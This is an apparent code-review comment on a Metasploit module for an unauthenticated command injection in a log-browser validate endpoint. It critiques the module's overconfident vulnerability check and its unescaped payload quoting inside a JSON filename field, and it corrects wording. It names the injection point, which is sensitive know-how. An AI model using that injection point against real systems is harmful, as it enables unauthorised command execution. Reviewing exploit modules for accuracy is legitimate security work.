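Review bot: `check` returns `Exploit::CheckCode::Vulnerable` as soon as `/api/log_browser/validate` answers `{"message": "success", "success": true}` to a POST carrying a random `.raw` filename, but that response only shows that the unauthenticated endpoint exists and accepts the input; it does not observe the injection itself, nor the version (the description says only 4.4.2 and 4.4.137 were tested). `CheckCode::Detected` (or `Appears`) is the accurate return here, with `Vulnerable` reserved for a check that confirms the injected command actually ran. A second point in `exploit`: `payload.encoded` is interpolated into a double-quoted shell string inside the JSON `file` value, so a payload containing `"` or a newline breaks the quoting; either escape it or declare those as bad characters in the payload options. Wording in the description: "an command injection" should be "a command injection", and "takes a user input and then use it" should be "takes user input and then uses it".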